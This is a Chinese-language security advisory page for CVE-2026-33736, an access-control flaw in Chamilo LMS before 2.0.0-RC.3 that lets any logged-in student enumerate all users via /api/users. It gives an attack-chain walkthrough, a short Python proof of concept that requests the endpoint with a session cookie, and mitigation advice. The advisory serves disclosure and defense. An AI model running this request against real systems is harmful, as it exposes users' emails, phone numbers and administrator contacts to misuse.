CVE-2026-33736 CVSS 6.5 中危

CVE-2026-33736 Chamilo LMS 信息泄露漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33736

漏洞类型

信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Chamilo LMS

漏洞概述

Chamilo LMS在2.0.0-RC.3之前的版本中存在一个严重的信息泄露漏洞。由于API接口缺乏适当的权限验证机制，任何经过身份验证的用户（包括低权限的学生账号）都可以通过访问/api/users端点，枚举系统中的所有用户信息。这导致攻击者能够获取包括管理员在内的所有用户的敏感个人数据，如电子邮件地址、电话号码和用户角色。该漏洞已在2.0.0-RC.3版本中得到修复。

技术细节

该漏洞属于典型的越权访问（IDOR/Broken Access Control）问题。在受影响的Chamilo LMS版本中，/api/users端点的设计逻辑存在缺陷，仅验证了请求者是否持有有效的会话凭证（即是否登录），而未对请求者的角色权限进行校验。攻击者首先需要注册一个普通用户账号或使用现有的低权限账号登录。登录后，攻击者无需经过管理员批准或特殊交互，直接构造HTTP GET请求发送至/api/users接口。服务器响应将返回完整的用户列表数据。利用该漏洞，攻击者可以轻易获取管理员账号的联系方式，为进一步的社工攻击或凭证爆破提供数据支持。

攻击链分析

STEP 1

1. 获取凭证

攻击者在目标平台注册一个普通学生账号，或通过其他方式获取任一低权限账号的登录凭证。

STEP 2

2. 会话建立

攻击者使用获取的凭证登录Chamilo LMS系统，建立有效的用户会话，获取Session ID或认证Token。

STEP 3

3. 发起越权请求

攻击者利用该会话凭证，直接向服务器发送GET请求访问/api/users接口。

STEP 4

4. 数据获取

服务器由于未校验权限，返回系统中所有用户（含管理员）的详细信息（邮箱、电话、角色等），攻击者保存数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target = 'http://vulnerable-host.com'
api_endpoint = '/api/users'

# Use a valid session cookie from a low-privilege user (e.g., student)
# Replace 'your_session_cookie_here' with actual cookie value
cookies = {
    'PHPSESSID': 'your_session_cookie_here'
}

try:
    # Send GET request to the vulnerable endpoint
    response = requests.get(target + api_endpoint, cookies=cookies)

    if response.status_code == 200:
        print("[+] Vulnerability confirmed! User data leaked:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"Error: {e}")

影响范围

Chamilo LMS < 2.0.0-RC.3

防御指南

临时缓解措施

如果无法立即升级，建议在WAF或反向代理层阻断外部对/api/users路径的直接访问，仅允许受信任的内网管理IP调用。同时，应加强用户账号的监控，关注是否存在异常的数据批量导出行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表